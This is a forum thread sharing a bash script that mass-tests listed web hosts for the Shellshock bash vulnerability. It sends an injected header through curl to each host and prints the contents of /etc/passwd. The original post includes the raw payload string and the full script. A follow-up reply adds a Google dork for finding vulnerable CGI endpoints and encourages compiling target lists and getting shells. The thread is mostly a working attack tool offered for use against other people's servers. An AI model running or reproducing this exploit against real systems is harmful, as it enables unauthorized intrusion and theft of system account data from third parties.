User Controls

Mass Shellshocker.

  1. Sophie Pedophile Tech Support
    Simply load up a list of vulnerable hosts or one's that may be vulnerable to find out if they actually are and the shellscript will send the payload:


    '() { :; };echo;/bin/cat /etc/passwd
    To retrieve their entries respectively, shout out to Lanny for helping me to get this to work properly.
    Here is the script if you're interested. Or you can of course as always get the script directly from github as well. https://github.com/NullArray/Shellshocker


    #!/bin/bash

    usage()
    { printf "%b \a\n\nSelect the 'List' option to specify a path to a list of URLs to be tested, in example 'Path to list: /tmp/list.txt',
    after doing so you can select the 'Output' option to specify a location to which a copy of the script's output will be saved.
    This option is not mandatory however and output will be printed to the terminal regardless of whether it is set or not.

    Finally after a list of URLs has been loaded you can test them for the shellshock vulnerability by selecting the 'Test' option.
    If any given host is vulnerable the contents of their /etc/passwd will be retrieved and printed to the terminal.
    Upon completion the script will exit.
    \n"
    }


    printf "%b" "\a\n\nTo use shellshocker please select an option below, select the 'Help' option for details on the script's functionality:\n"

    PS3='Please enter your choice: '
    options=("Output" "List" "Test" "Help" "Quit")
    select opt in "${options[@]}"
    do
    case $opt in
    "Output")
    read -p 'Location to save output to: ' outfile
    printf "%b \n"
    ;;
    "List")
    read -p 'Path to list: ' list
    printf "%b \n"
    ;;
    "Test")
    if [ "$list" == "" ]
    then
    echo "To test a list of URLs one needs to be supplied via the 'List' option"
    printf "%b \n"
    else
    cat $list | xargs -I % bash -c 'curl % -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd" && echo ----END OF RESPONSE----' | tee $outfile
    printf "%b \a\n\n

    Done, exiting.\n"
    break
    fi
    ;;
    "Help")
    usage
    ;;
    "Quit")
    break
    ;;
    *) echo invalid option;;
    esac
    done
  2. Any examples of vulnerable platforms? I've never really understood how to exploit shellshock, but it's making more sense from this post.
  3. Sophie Pedophile Tech Support
    Any examples of vulnerable platforms? I've never really understood how to exploit shellshock, but it's making more sense from this post.

    Any old unpatched linux system that runs bash and has a webapp interacting with the user through CGI. You interact with the remote host through curl, or alternatively you can use a specialized command injection tool to get a shell.


    Dork:

    inurl:wspd_cgi.sh



    As search query in google if you want to go ahead and try to compile a list of vulnerable hosts, you could even test if they are vulnerable for sure with my script lulz.
Jump to Top